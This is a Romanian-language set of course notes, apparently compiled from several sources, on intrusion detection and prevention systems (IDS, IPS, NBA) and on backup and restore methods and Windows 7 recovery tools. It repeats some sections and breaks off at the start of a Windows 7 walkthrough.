Pentru inceput sa facem o comparatie intre cele trei instrumente IDS, NBA si IPS
NBA este un instrument ce are capacitatea de a identifica anumite modele de trafic care
nu sunt considerate normale in traficul de zi cu zi din retea. Pur si simplu, aceasta este o
incercare a industriei din domeniu de a identifica nereguli in retea dincolo de pragul simplu al
setarilor pentru trafic excesiv. Unul dintre cele mai raspandite modele de trafic anormal ce
reprezinta o amenintare la adresa securitatii retelei este modelul cunoscut ca atac DdoS
(Distributed Denial of Service). Acest tip de atac este o mare amenintare la adresa securitatii
furnizorilor de servicii de Internet precum si pentru infrastructurile mari de retea. Distributed
Denial of Service (DDoS) – acest atac foloseste atacuri DoS pornite de mai multe host-uri. Prima
data atacatorul compromite host-urile vulnerabile, folosind diferite instrumente si tehnici, apoi
urmeaza atacul real DDoS pe o anumita tinta folosind intreg grupul de host-uri compromise.
IPS-urile sunt dispozitive instalate in retea destinate detectarii si blocarii unei mari
varietati de atacuri. Unele studii din domeniul cercetarii arata ca aceste IPS-uri sunt folosite
pentru detectarea intruziunii si pentru monitorizarea pasiva a traficului.
Cu alte cuvinte orice echipament IPS poate fi folosit ca si echipament IDS.
Echipamentele IPS in general lucreaza impreuna cu sistemele NBA si IDS. Cand este
detectat un atac de catre IDS sau NBA, sistemul IPS poate sterge pachetele respective,
permitand totusi ca restul traficului sa treaca.
Un sistem NBA poate fi considerat un pic mai putin proactiv decat cel IDS si, in general, se
axeaza pe traficul intern. Poate fi de asemenea implementat si peste o anumita conexiune si sa
inspecteze pachete exact ca un IDS. Spuneam mai putin proactiv deoarece NBA incearca sa
recunoasca problemele care sunt deja in curs de desfasurare (de exemplu, scanarea retelei sau
atacurilor DDOS, care sunt in curs de desfasurare). Incearca sa identifice amenintarile ce nu au
fost identificate de IDS sau de software-ul antivirus. Deoarece sistemul NBA este orientat spre
identificarea simptomelor sau a comportamentelor actualizarea motorului de analiza se face
mai rar comparativ cu sistemele IDS.
IDS Software:
Snort IDS (under binaries);
WinPcap (for packet capturing);
LiTe Sniffer (network traffic monitor);
IDScenter (Snort front end)

IDS/IPS
IDS - Sisteme de detectie ale
intruziunilor
Un sistem de detectie al
intruziunilor - IDS (Intrusion
Detection System) reprezinta
un echipament (sau o
aplicatie) care monitorizeaza
activitatile retelei si/sau
sistemului cautand activitati
malitioase sau violari ale
politicilor.
Detectia intruziunilor este
procesul de monitorizare a
evenimentelor care au loc
intr-un sistem sau o retea de
calculatoare si analiza lor
pentru a detecta posibile
incidente care sunt violari sau
amenitari iminente de violare
a politicilor de securitate, a
politicilor de utilizare acceptate sau a practicilor standard de securitate. Prevenirea intruziunilor
este procesul prin care se desfasoara detectia intruziunilor si incercarea de inlaturare a
posibilelor incidente detectate. Sistemele de detectie si prevenire ale intruziunilor - IDPS
(Intrusion Detection-Prevention Systems) au ca scop principal identificarea posibilelor
incidente, inregistrarea informatiilor despre ele, incercarea de inlaturare a incidentelor si
raportarea catre administratorii de securitate. In plus, organizatiile pot folosi IDPS-urile si
pentru alte scopuri: identificarea problemelor legate de politicile de securitate, documentarea
amenintarilor existente si descurajarea indivizilor in a incalca politicile de securitate.

1.2. Tipuri de IDS-uri


1.2.1. Network-based si host-based
Sistem de detectie al intruziunilor de tip network-based
Intr-un sistem de detectie al intruziunilor de tip network-based - Network-based Intrusion
Detection System (NIDS) - senzorii sunt localizati in puncte critice ale retelei care este
monitorizata, de cele mai multe ori la marginea retelei sau in DMZ (demilitarized zone). Senzorii
capteaza tot traficul din retea si analizeaza continutul fiecarui pachet cautand urme de trafic
malitios.
Un NIDS reprezinta o platforma independenta care identifica intruziunile prin examinarea
traficului din retea si monitorizeaza mai multe statii. NIDS-urile pot vizualiza traficul din retea
prin conectarea lor la un hub sau la un echipament switch configurat cu port mirroring.
Sistem de detectie al intruziunilor de tip host-based
Intr-un sistem de detectie al intruziunilor de tip host-based - Host-based Intrusion
Detection System (HIDS) - senzorul consta, de obicei, intr-un agent software care monitorizeaza
toata activitatea ce se desfasoara pe statia pe care este instalat, incluzand aici sistemul de
fisiere, kernel-ul si chiar aplicatii in unele cazuri.
Un HIDS reprezinta un agent care ruleaza local pe statie si care identifica intruziunile analizand
activitatile sistemului, aplicatiile, modificarile sistemului de fisiere si alte activitati ale statiei.
1.2.2. Sisteme pasive si sisteme active
Intr-un sistem pasiv, senzorul sistemului de detectie al intruziunilor (IDS) detecteaza o
potentiala bresa de securitate, inregistreaza informatia si alerteaza administratorul folosind o
metoda specifica (mesaje in consola, alerte, etc.). Intr-un sistem reactiv, cunoscut sub
denumirea de Sistem de Prevenire al Intruziunilor - Intrusion Prevention System (IPS), IPS-ul
raspunde activitatii suspicioase prin terminarea conexiunii sau prin reprogramarea firewall-ului
de a bloca traficul de retea provenind de la sursa malitioasa suspectata. Aceasta se poate
intampla automat sau la comanda unui operator.
Desi ambele se refera la securitatea unei retele, si uneori notiunile pot fi confundate, un IDS
difera de un firewall deoarece firewall-ul urmareste semne ale intruziunilor pentru a le
impiedica sa se intample. Un IDS evalueaza o posibila intruziune o data ce a avut loc si
semnaleaza o alerta. Un sistem care termina conexiunea ca metoda de raspuns este un IPS si
poate fi privit uneori ca o forma de firewall la nivel de aplicatie.
Termenul IDPS - Sistem de Detectie si Prevenire al intruziunilor se refera la sisteme de
securitate hibride care atat detecteaza intruziunile cat si incearca sa le previna.
1.2.3. IDS-uri bazate pe anomalii si IDS-uri bazate pe semnaturi
Sistemele de detectie ale intruziunilor folosesc cel putin una dintre cele doua tehnici de
detectie: anomalii statice si/sau semnaturi.
IDS bazat pe anomalii statice - Un astfel de IDS stabileste o valoare initiala de performanta
bazata pe evaluari ale traficului normal din retea. Dupa efectuarea acestui pas initial, IDS-ul va
raporta traficul curent din retea la valoarea initiala stabilita pentru a stabili daca se incadreaza
in limitele normale. Daca traficul din retea depaseste limitele normale va fi generata o
alarma. IDS bazat pe semnaturi - Un astfel de IDS examineaza traficul din retea cautand modele
de atac preconfigurate si predeterminate cunoscute sub numele de semnaturi. Multe atacuri
astazi au semnaturi diferite. Pentru a putea face fata amenintarilor o colectie de astfel de
semnaturi trebuie actualizata in permanenta.
1.3. Limitari si tehnici de evitare ale IDS-urilor
Capabilitatile unui IDS pot fi limitate de:
 Zgomot - Zgomotul poate afecta in mod sever eficacitatea unui IDS. Pachete gresite,
generate de defectiuni ale software-urilor, date DNS alterate si pachete locale care au scapat
pot crea o rata foarte crescuta de alarme false.
 Prea putine atacuri - Nu este neobisnuit ca numarul de atacuri reale sa fie mult sub rata
de alarme false. Atacurile reale pot fi atat de mult sub rata de alarme false incat sunt de obicei
ignorate de catre IDS.
 Actualizarea semnaturilor - Multe atacuri sunt indreptate catre versiuni specifice de
software. Pentru a putea face fata amenintarilor este nevoie de o colectie de semnaturi
actualizata in mod constant. O colectie de semnaturi care nu este actualizata poate lasa IDS-ul
vulnerabil la strategii noi de atac.
Tehnici de evitare a IDS-urilor:
 fragmentarea si trimiterea de pachete mici - o tehnica de baza care presupune
fragmentarea informatiei in mai multe pachete mai mici pentru a face imposibila reconstruirea
sesiunii la IDS
 fragmente care se suprapun - tehnica ce presupune crearea de pachete cu numere ale
secventei TCP care se suprapun incercand astfel sa se exploateze faptul ca sistemele de operare
trateaza diferit aceasta suprapunere: unele vor lua in considerare datele mai noi, altele datele
mai vechi
 violari de protocol - violari deliberate ale protocoalelor TCP sau IP in asa fel incat statia
tinta sa manevreze diferit pachetele decat IDS-ul
 inserarea de trafic in IDS - un atacator poate trimite pachete care sa ajunga doar la IDS
nu si la statia tinta rezultand astfel o serie de alarme false
 atacuri de tip DoS - un atacator poate evita un IDS prin efectuarea unui atac de tip DoS
asupra lui care sa ii consume resursele sau care sa genereze un numar foarte mare de alarme
false reusind astfel sa ascunda atacul real
1.4.Exemple de IDS-uri
Mai jos sunt prezentate o serie de Sisteme de Detectie ale Intruziunilor :
 OSSEC - http://www.ossec.net/
 Prelude Hybrid IDS - http://www.prelude-technologies.com/en/welcome/index.html
 Snort - http://www.snort.org/
 Suricata -https://redmine.openinfosecfoundation.org/projects/show/suricata
Daca doriti mai multe informatii despre Sistemele de Detectie ale Intruziunilor puteti
consulta una dintre adresele de mai jos:
 Intrusion Detection Systems de la Open Directory Project
 Guide to Intrusion Detection and Prevention Systems(IDPS) NIST SP 800-94, 02/2007
 Intrusion Detection/Prevention Systems classification tree

2. IPS - Sisteme de prevenire a intruziunilor


2.1. Introducere
Un Sistem de Prevenire al Intruziunilor - Intrusion Prevention System (IPS) - reprezinta un
echipament de securitate al retelei care monitorizeaza activitatile retelei si/sau sistemelor si
poate reactiona, in timp real, sa blocheze sau sa previna unele activitati malitioase. Tehnologia
prevenirii intruziunilor este vazuta de catre unii ca o extensie a tehnologiei de detectie a
intruziunilor, deoarece un IPS trebuie sa fie in acelasi timp si un foarte bun IDS pentru a asigura
o rata scazuta de alarme false.
Un IPS este, in mod obisnuit, conceput pentru a opera complet invizibil in retea. Produsele IPS
nu au de obicei o adresa IP din reteaua protejata dar pot raspunde in mod direct oricarui tip de
trafic prin diverse metode (terminarea conexiunilor, renuntarea la pachete, generarea de
alerte, etc.)
Desi unele IPS-uri au abilitatea de a implementa reguli de firewall aceasta este de obicei o
functie aditionala si nu una din functiile de baza ale produsului. Mai mult, tehnologia IPS ofera o
mai buna monitorizare a operatiilor unei retele furnizand informatii despre statiile active,
incercarile de autentificare esuate, continut necorespunzator si alte functii ale nivelelor retea si
aplicatie.
2.2. Diferente fata de IDS-uri
IPS-urile au unele avantaje fata de IDS-uri. Unul dintre acestea se refera la faptul ca IPS-
urile sunt proiectate sa fie implementate in-line astfel incat tot traficul sa treaca prin ele si sa
poata preveni atacurile in timp real. In plus, multe dintre solutiile IPS au capabilitatea sa
decodifice protocoalele de nivel aplicatie (HTTP, FTP, SMTP) oferind astfel o mai buna
monitorizare. Totusi atunci cand se doreste implementarea unui IPS de tip network-based
trebuie sa se ia in considerare faptul ca daca prin respectivul segment de retea circula trafic
criptat majoritatea produselor nu pot sa inspecteze astfel de trafic.
Un alt avantaj major ar fi faptul ca unele dintre IPS-uri au posibilitatea de a corecta unele dintre
metodele de evitare ale IDS-urilor(atacuri de tip DoS, inserarea de trafic).
2.3. Tipuri de IPS-uri
2.3.1. Host-based
Un Sistem de Prevenire al Intruziunilor este de tip host-based (HIPS) atunci cand aplicatia
de prevenire a intruziunilor se afla pe adresa IP specifica sistemului protejat, de obicei o singura
statie. HIPS complementeaza metodele antivirus traditionale bazate pe semnaturi deoarece nu
necesita o actualizare continua pentru a putea raspunde atacurilor. Deoarece codul daunator
trebuie sa modifice sistemul sau alte componente software care se afla pe masina in cauza un
HIPS va observa aceste modificari si va incerca sa previna aceasta actiune sau sa anunte
utilizatorul pentru permisiune.
Dezavantajul major al unui astfel de produs consta in folosirea extensiva a resurselor statiei pe
care se afla.
2.3.2. Network-based
Un Sistem de Prevenire al Intruziunilor este de tip network-based (NIPS) atunci cand
aplicatia/echipamentul de prevenire al intruziunilor se afla la o alta adresa IP decat statia pe
care o monitorizeaza. NIPS sunt platforme hardware/software care analizeaza, detecteaza si
raporteaza evenimente legate de securitatea unei retele/segment de retea de calculatoare.
2.3.3. Diferente intre IPS-uri de tip host-based si network-based
 HIPS-urile pot lucra atat cu date criptate cat si cu date necriptate deoarece analiza se
face dupa ce datele au fost decriptate de catre statie
 NIPS-urile nu folosesc din memoria si procesorul statiilor care le protejeaza ci dispun de
propria memorie si propriul procesor
 NIPS-urile se afla in punctele critice ale retelei si tot traficul depinde de buna lor
functionare, fapt ce poate constitui un dezavantaj atunci cand echipamentul este nefunctional
 NIPS-urile pot detecta evenimente distribuite in retea (evenimente de prioritate joasa
dar care afecteaza mai multe statii din retea) si pot reactiona in timp ce HIPS-urile au la
dispozitie doar datele de pe masina pe care functioneaza pentru a putea lua o decizie
Mai jos sunt prezentate o serie de Sisteme de Prevenire ale Intruziunilor :
 Snort -http://www.snort.org/
 Suricata-https://redmine.openinfosecfoundation.org/projects/show/suricata
 Winpooch -http://sourceforge.net/projects/winpooch/

IDS/IPS
IDS (IntrusionDetectionSystem)
Un sistem de detectare a intruziunilor (IDS) monitorizează traficul din rețea pentru
activități suspecte și alerteaza sistemul sau administratorul de rețea. În unele cazuri, IDS pot
răspunde, de asemenea, la traficul anormal sau rău intenționat prin luarea de măsuri, cum ar fi
blocarea de utilizator sau adresa IP a sursei ce a accesat rețeaua.
IDS vin au o mare varietate de forma și se apropie de obiectivul de a detecta traficul
suspect în moduri diferite. Există IDS bazată pe retea (NIDS) și IDS bazata pe hostul sistemului
(HIDS). Există IDS care detecteaza dupa căutarea de semnături specifice cunoscute la fel ca si
software-ul antivirus și există IDS care detecteaza intruziunile bazandu-se pe compararea
tiparele de trafic de o bază inițială și caută anomalii. Există IDS care monitorizează pur și simplu
și de alertă și sunt IDS care efectuează o acțiune sau măsuri ca răspuns la o amenințare
detectată.
NIDS
Network Intrusion Detection Systems sunt plasate într-un punct(e) strategice pentru a
monitoriza traficul de intrarea si iesire de la toate dispozitivele din rețea. În mod ideal, ar scana
tot traficul de intrare și de ieșire, însă acest lucru ar putea crea un blocaj care ar putea afecta
viteza de ansamblu a rețelei.
HIDS
Host Intrusion Detection Systems ruleaza pe gazde individuale sau dispozitive din rețea.
HIDS monitorizează pachetele de intrare și de ieșire din aparat și va alerta utilizatorul sau
administratorul in caz ca o activitate suspecta este detectată
Bazat pe semnatura
Un IDS bazat pe semnătura va monitoriza pachetele de rețea și le va compara cu o baza de
date de semnături sau cu niste atribute de amenințări malware cunoscute. Acest lucru este
similar cu modul in care software-ul antivirus detecteaza malware. Problema este in cazul in
care amenintarea este insa ea nu e in baza de date, atunci ea nu va fi detectata.
Bazat pe anomalie
Un IDS care se bazează anomalie va monitoriza traficul în rețea și il va compara cu o bază
stabilita. Linia de bază va identifica ceea ce este "normal" pentru rețea, adica: ce fel de lățime
de bandă este utilizat în general, ce protocoale sunt folosite, ce porturi si dispozitive sunt
conectare în general, iar atunci este detectat de trafic anormal se va alerta administratorul sau
utilizatorul.
IDS pasive
Un IDS pasiv pur și simplu detectează și alerteaza. Când este detectat trafic suspect sau
rău intenționat o alertă este generata și trimisa administratorului sau utilizatorului, care trebuie
sa ia măsuri pentru a bloca activitatea sau să răspundă într-un fel.
IDS reactive
Un IDS reactive nu doar va detecta traficul suspect sau rău intenționat și va alerta
administratorul, dar va lua măsuri proactive predefinite pentru a răspunde amenințării. De
obicei acest lucru înseamnă blocarea traficului și mai departe orice rețea de la adresa IP sursă
sau utilizator.

IPS(Intrusion prevention systems)


IPS sunt dispozitive de securitate de rețea, care monitorizează activitățile de sistem de
rețea și / sau pentru activitatea malware. Principalele funcții ale IPS sunt de a identifica
activitatea de malware, a face un loga informațiilor despre această activitate, încercarea de a
bloca / opri, și raportare.
IPS intruziunilor sunt considerate extensii ale IDS, deoarece ambele monitorizeaza traficul
de rețea si contin un sistem de activități in caz ca a fost detectat o actiune malware. Principalele
diferențe sunt: spre deosebire de IDS, IPS sunt plasate în linie și sunt capabili de a preveni /
bloca intruziunile care sunt detectate în mod activ. Mai precis, IPS poate efectua astfel de
acțiuni ca trimiterea de alarma, stergerea pachetelor malware, resetarea conexiunii și / sau
blocarea traficului de la adresa IP. Un IPS poate corecta, de asemenea, prin CRC erorile,
defragmenteaza fluxurile de pachete, pentru a preveni problemele de secventiere a TCP, și
sterge transportul nedorit și opțiuni din layer-ul de rețea.
Clasificari:
- IPS bazate pe retea (NIPS): monitorizeaza intreaga retea prin analiza activitatii
protocoalelor.
- IPS Wireless (WIPS): monitorizeaza o retea fara fir prin analiza protocoalelor respective.
- Analiza comportamentului de retea (NBA): examinează traficul de rețea pentru a
identifica amenințările care generează fluxuri de trafic neobișnuite, cum ar fi DDoS atacuri,
anumite forme de malware și de încălcări ale politicii.
- IPS bazate pe host (HIPS): un pachet de software-ul instalat, care monitorizează o
singură gazdă pentru activitate suspectă, analizeaza evenimentele care au loc în această gazdă.
IPS ca si IDS are metodele de detectare bazate pe semnatura si bazate pe anomalie

Cyberarms Intrusion Detection


Cyberarms Intrusion Detection este un soft shareware care protejeaza SO Windows de
atacuri brute force si incercari de intruziune.

Componente:
Securing FTP Access – monitorizeaza traficul pe portul TCP/IP pe care ruleaza serverul FTP
Securing Microsoft Exchange Outlook Web Access – monitorizeaza rapoartele log
Windows pentru logari nereusite. Folositi aceasta componenta pentru a securiza aplicatiile ce
folosesc autentificarea Windows (Outlook, MES, CRM etc.)

Securing Microsoft SQL Server – monitorizeaza logarile nereusite la autentificarea SQL


Server
Securing SMTP Access – monitorizeaza traficul din retea. Multe programe malitioase
utilizate de spammeri incearca sa intre in sistem utilizand autentificarea SMTP pentru a-si
trimite email-urile prin serverul dvs.
IDS - sistem de detecție al intruziunilor (Intrusion Detection System) reprezintă un
echipament (sau o aplicație) care monitorizează activitățile rețelei și/sau sistemului căutînd
activități malițioase sau violări ale politicilor.
Detecția intruziunilor este procesul de monitorizare a evenimentelor care au loc într-un
sistem sau o rețea de calculatoare și analiza lor pentru a detecta posibile incidente care sunt
violări sau amenințări iminente de violare a politicilor de securitate, a politicilor de utilizare
acceptate sau a practicilor standard de securitate.
Prevenirea intruziunilor este procesul prin care se desfășoară detecția intruziunilor și
incercarea de înlaturare a posibilelor incidente detectate. Sistemele de detecție și prevenire ale
intruziunilor - IDPS (Intrusion Detection-Prevention Systems) au ca scop principal identificarea
posibilelor incidente, înregistrarea informațiilor despre ele, încercarea de înlaturare a
incidentelor și raportarea către administratorii de securitate. În plus, organizațiile pot folosi
IDPS-urile și pentru alte scopuri: identificarea problemelor legate de politicile de securitate,
documentarea amenințărilor existente și descurajarea indivizilor în a încălca politicile de
securitate.

Tipuri de IDS-uri:
 Sistem de detecție al intruziunilor de tip network-based. Într-un sistem de detecție al
intruziunilor de tip network-based - Network-based Intrusion Detection System (NIDS) - senzorii
sunt localizați în puncte critice ale rețelei care este monitorizată, de cele mai multe ori la
marginea rețelei sau in DMZ (demilitarized zone). Senzorii captează tot traficul din rețea și
analizează conținutul fiecărui pachet căutand urme de trafic malițios.
Un NIDS reprezintă o platformă independentă care identifică intruziunile prin examinarea
traficului din rețea și monitorizează mai multe stații. NIDS-urile pot vizualiza traficul din rețea
prin conectarea lor la un hub sau la un echipament switch configurat cu port mirroring.

 Sistem de detecție al intruziunilor de tip host-based.Într-un sistem de detecție al


intruziunilor de tip host-based - Host-based Intrusion Detection System (HIDS) - senzorul
constă, de obicei,într-un agent software care monitorizează toata activitatea ce se desfașoară
pe stația pe care este instalat, incluzînd aici sistemul de fișiere, kernel-ul si chiar aplicații în
unele cazuri.
Un HIDS reprezintă un agent care rulează local pe stație și care identifică intruziunile analizînd
activitațile sistemului, aplicațiile, modificările sistemului de fișiere și alte activităti ale stației.

Tehnici de evitare a IDS-urilor:


 fragmentarea şi trimiterea de pachete mici - o tehnică de bază care presupune
fragmentarea informaţiei în mai multe pachete mai mici pentru a face imposibilă reconstruirea
sesiunii la IDS;
 fragmente care se suprapun - tehnică ce presupune crearea de pachete cu numere
ale secvenţei TCP care se suprapun încercând astfel să se exploateze faptul că sistemele de
operare tratează diferit această suprapunere: unele vor lua în considerare datele mai noi, altele
datele mai vechi;
 violări de protocol - violări deliberate ale protocoalelor
TCP sau IP în aşa fel încât staţia ţintă să manevreze diferit pachetele decât IDS-ul;
 Inserarea de trafic în IDS - un atacator poate trimite pachete care să ajungă doar la IDS
nu şi la staţia ţintă rezultând astfel o serie de alarme false;

 Atacuri de tip DoS - un atacător poate evita un IDS prin efectuarea unui atac
de tip DoS asupra lui care să îi consume resursele sau care să genereze
un număr foarte mare de alarmefalse reuşind astfel să ascundă atacul real.

Un Sistem de Prevenire al Intruziunilor - Intrusion Prevention System (IPS) - reprezinta un


echipament de securitate al retelei care monitorizeaza activitatile retelei si/sau sistemelor si
poate reactiona, in timp real, sa blocheze sau sa previna unele activitati malitioase. Tehnologia
prevenirii intruziunilor este vazuta de catre unii ca o extensie a tehnologiei de detectie a
intruziunilor, deoarece un IPS trebuie sa fie in acelasi timp si un foarte bun IDS pentru a asigura
o rata scazuta de alarme false.
Un IPS este, in mod obisnuit, conceput pentru a opera complet invizibil in retea. Produsele
IPS nu au de obicei o adresa IP din reteaua protejata dar pot raspunde in mod direct oricarui tip
de trafic prin diverse metode (terminarea conexiunilor, renuntarea la pachete, generarea de
alerte, etc.)
Desi unele IPS-uri au abilitatea de a implementa reguli de firewall aceasta este de obicei o
functie aditionala si nu una din functiile de baza ale produsului. Mai mult, tehnologia IPS ofera o
mai buna monitorizare a operatiilor unei retele furnizand informatii despre statiile active,
incercarile de autentificare esuate, continut necorespunzator si alte functii ale nivelelor retea si
aplicatie.

IPS-urile au unele avantaje faţă de IDS-uri. Unul dintre acestea se referă la faptul că IPS-
urile sunt proiectate să fie implementate în-line astfel încât tot traficul să treacă prin ele şi să
poată preveni atacurile în timp real. În plus, multe dintre soluţiile IPS au capabilitatea să
decodifice protocoalele de nivel aplicaţie (HTTP, FTP, SMTP) oferind astfel o mai bună
monitorizare. Totuşi atunci când se doreşte implementarea unui IPS de tip network-based
trebuie să se ia în considerare faptul că dacă prin respectivul segment de reţea circulă trafic
criptat majoritatea produselor nu pot să inspecteze astfel de trafic.
Un alt avantaj major ar fi faptul că unele dintre IPS-uri au posibilitatea de a corectă unele
dintre metodele de evitare ale IDS-urilor(atacuri de tip DoS, inserarea de trafic).

Tipuri de IPS-uri:
 Un Sistem de Prevenire al Intruziunilor este de tip host-based (HIPS) atunci când
aplicaţia de prevenire a intruziunilor se află pe adresa IP specifică sistemului protejat, de obicei
o singură staţie. HIPS complementeaza metodele antivirus tradiţionale bazate pe semnături
deoarece nu necesită o actualizare continuă pentru a putea răspunde atacurilor. Deoarece
codul dăunător trebuie să modifice sistemul sau alte componente software care se află pe
maşină în cauza un HIPS va observă aceste modificări şi va încerca să prevină această acţiune
sau să anunţe utilizatorul pentru permisiune. Dezavantajul major al unui astfel de produs
constă în folosirea extensivă a resurselor staţiei pe care se află.

 Un Sistem de Prevenire al Intruziunilor este de tip network-based (NIPS) atunci când


aplicaţia/echipamentul de prevenire al intruziunilor se află la o altă adresa IP decât staţia pe
care o monitorizează. NIPS sunt platforme hardware/software care analizează, detectează şi
raportează evenimente legate de securitatea unei reţele/segment de reţea de calculatoare.

Diferențe între IPS-uri de tip host-based și network-based


 HIPS-urile pot lucra atât cu date criptate cât şi cu date necriptate deoarece analiză se
face după ce datele au fost decriptate de către staţie;

 NIPS-urile nu folosesc din memoria şi procesorul staţiilor care le protejează ci dispun de


propria memorie şi propriul procesor;

 NIPS-urile se află în punctele critice ale reţelei şi tot traficul depinde de bună lor
funcţionare,fapt ce poate constitui un dezavantaj atunci când echipamentul este nefuncţional

 NIPS-urile pot detecta evenimente distribuite în reţea (evenimente de prioritate joasă


dar care afectează mai multe staţii din reţea) şi pot reacţiona în timp ce HIPS-urile au la
dispoziţie doar datele de pe maşină pe care funcţionează pentru a putea lua o decizie. [4]
1. Noţiuni teoretice Backup & Restore pentru SO
Clonare disc sau partitie
Clonare disc – copierea intregului hard disk pe un alt hard disk (asta insemnand toate partitiile cu
tot ce contin acestea)
Clonare partitii – copierea unei singure partitii cu tot ce contine acesta, pe un alt hard disk
De ce am vrea sa copiem vechiul hard pe noul hard?
Pentru ca doar simpla instalarea a unui sistem de operare Windows pe hardul nou ar fi durat pe
putin 45 de minute, plus instalarea driverelor, softurilor preferate, crearea partitiilor si apoi copierea
manuala a fisierelor de pe vechiul hard disk, ar fi durat mult mai mult, ar fi trebuit sa parcurgem mai
multi pasi, sa instalam, sa dezinstalam, sa restartam PC-ul de cateva ori.
Putem scapa de tot acest chin prin simpla folosire a unei imagini ISO mici pe care va trebui sa o
descarcam si sa facem un CD sau USB bootabil. Odata ce avem CD-ul sau USB bootabil, va trebui sa
mai avem conectat in calculatorul nostru si hard disk-ul pe care planuim sa copiem fisierele sau
partitiile cu tot ce contin ele sau sa restauram.
E foarte utila cand avem nevoie sa schimbam hard discul
Backup criptat
Permite crearea imaginii de backup in care datele sunt criptate deupa un anumit algoritm, astfel se
restirictioneaza accesul la datele din imaginea da backup doar persoanelor care stiu cheiea de criptare.
Dezavanajul este ca creste timpul de creare backup si timpul de restore.
Backup compresat
Creaza backup-ul utilizand algoritmi de compresie a datelor astfel economisindu-se spatial de
memorie alocat imaginii de backup. Dezavanajul este ca creste timpul de creare backup si timpul de
restore.
Backup programat
Crearea de backup-uri automat la o anumita data/ora, sau adaugarea de informatii la un backup
existent.
Backup incremental
Ofera o copie de rezerva a fisierelor care sunt noi sau care sau modificat de la ultimul Backup,
creand la fiecare Backup cate o imagine cu aceste fisiere, astfel la Restore va fi nevoie de Backup-ul
complet plus toate backup-urile incrementale facute pana la data respectiva. La Restore se vor restabili
toate versiunile unui fisier. Utilizand aceasta tehnologie obtinem operatii de backup mai rapide(in afara
de primul backup), insa operatia de Restore va fi mai lenta.
Differential backup
Acest tip de backup acumuleaza la fiecare operatie de backup toate schimbarile fisierelor de la
ultimul backup complet, astfel creandu-se 2 fisiere: backup-ul complet si backup-ul diferential. La
Restore va fi nevoie doar de 2 fisiere deci opertatia va fi mai rapida. Dezavantajul acestei metode este
ca odata cu trecerea timpului se vor adauga tot mai multe fisiere pentru bckup deci va creste si timpul
de backup.

SO Windows 7 oferă următoarele instrumente pentru Backup & Restore:


Copiere de rezervă fișiere
Copiere de rezervă Windows vă permite să faceți copii de rezervă ale fișierelor de date pentru toate
persoanele care utilizează computerul. Este posibil să lăsați ca Windows să aleagă la ce face copii de
rezervă sau să selectați folderele, bibliotecile și unitățile individuale cărora doriți să le faceți copii de
rezervă. În mod implicit, copiile de rezervă sunt create pe baza unei planificări regulate. Aveți
posibilitatea să modificați planificarea sau să creați manual o copie de rezervă, în orice moment. După
ce configurați Copiere de rezervă Windows, Windows va urmări fișierele și folderele care sunt noi sau
modificate și le adaugă la copia de rezervă.

Copiere de rezervă imagine de sistem


Copiere de rezervă Windows vă oferă posibilitatea de a crea o imagine de sistem, care este o
imagine exactă a unei unități. O imagine de sistem include, de asemenea, Windows și setările de
sistem, programele și fișierele. O imagine de sistem se poate utiliza pentru a restaura conținutul
computerului dacă se întâmplă ca hard diskul sau computerul să nu mai funcționeze. Când restaurați
computerul dintr-o imagine de sistem, este o restaurare completă. Nu se pot alege elemente individuale
de restaurat, iar toate programele, setările de sistem și fișierele curente vor fi înlocuite. Cu toate că
acest tip de copie de rezervă include fișierele personale, se recomandă să faceți copii de rezervă
fișierelor în mod regulat, utilizând Copiere de rezervă Windows, pentru a putea restaura fișiere și
foldere individuale dacă este necesar. Când configurați copierea de rezervă programată pentru fișiere,
se poate opta dacă includeți sau nu o imagine de sistem. Această imagine de sistem include doar
unitățile necesare pentru executarea Windows. Aveți posibilitatea să creați manual o imagine de
sistem, dacă doriți să includeți unități de date suplimentare.

Versiuni anterioare
Versiunile anterioare sunt copii ale fișierelor și folderelor pe care Windows le salvează automat ca
parte a protecției sistemului. Se pot utiliza versiunile anterioare pentru a restaura fișiere sau foldere
care au fost modificate sau șterse accidental, sau care au fost deteriorate. În funcție de tipul de fișier
sau folder, este posibilă deschiderea, salvarea la o altă locație sau restaurarea unei versiuni anterioare.
Versiunile ulterioare pot fi utile, dar nu ar trebui considerate ca fiind o copie de rezervă, deoarece
fișierele vor fi înlocuite de noile versiuni și nu vor fi disponibile dacă se defectează unitatea.

Restaurare sistem
Restaurare sistem vă ajută să restaurați fișierele sistem ale computerului la un moment anterior. Este
un mod de a anula modificările de sistem efectuate asupra computerului, fără a afecta fișiere personale,
cum ar fi mesajele de poștă electronică, documentele sau fotografiile.

Uneori, instalarea unui program sau a unui driver poate cauza o modificare neprevăzută asupra
computerului sau un comportament imprevizibil al sistemului de operare Windows. De obicei,
dezinstalarea programului sau a driverului corectează problema. Dacă în urma dezinstalării problema
nu se rezolvă, aveți posibilitatea să încercați restaurarea sistemului computerului la o dată anterioară la
care totul funcționa corect.

Restaurare sistem utilizează o caracteristică denumită Protecție sistem pentru a crea și salva regulat
puncte de restaurare pe computer. Aceste puncte de restaurare conțin informații despre setările pentru
registry și alte informații pe care Windows le utilizează. De asemenea, aveți posibilitatea să creați
manual puncte de restaurare.
Protecție sistem este o funcționalitate care creează și salvează regulat informații despre fișierele și
setările de sistem ale computerului. De asemenea, Protecție sistem salvează versiunile anterioare ale
fișierelor pe care le-ați modificat. Aceste fișiere sunt salvate în puncte de restaurare, care sunt create
imediat înaintea unor evenimente de sistem semnificative, cum ar fi instalarea unui program sau a unui
driver de dispozitiv. De asemenea, acestea mai sunt create automat la interval de șapte zile, dacă nu au
fost create alte puncte de restaurare în precedentele șapte zile, dar puteți crea manual puncte de
restaurare, în orice moment.

Protecția de sistem este activată automat pentru unitatea pe care este instalat Windows. Protecția de
sistem se poate activa doar pentru unitățile formatate cu sistemul de fișiere NTFS.

Creare disc de reparare sistem

Un disc de reparare a sistemului se poate utiliza pentru a incarca SO pe computer, el va poate a juta
sa recuperate SO dupa o eroare sau sa restaurati computerul dupa o imagine de sistem.
Dacă fișierul sistemului original este suprascris, acesta poate modifica conținutul fișierului pe care
sistemul nu va fi capabil să interpreteze, acesta este clasificat ca o eroare gravă, și sistemul se oprește.
În acest caz, din păcate, sunt amenințate documentele importante, imagini, filme, clipuri video chiar si
2
alte imagini de sistem de pe discul dur a computerului. În cazul în care producătorul a furnizat disc de
Reparație a sistemul, putem repara ușor. Dacă nu aveți acest disc, Windows 7 va ofera posibiliatea
crearii acestui disc.

2. Exemplu de utilizare a instrumentului de Backup & Restore implicit SO


Windows 7
Sistemul de Operare Windows 7 dispune de un instrument confortabil de Backup & Restore. Pentru
a ne folosi de acest instrument accesa Panou de control\Toate elementele din Panoul de
control\Copiere de rezervă și restaurare:

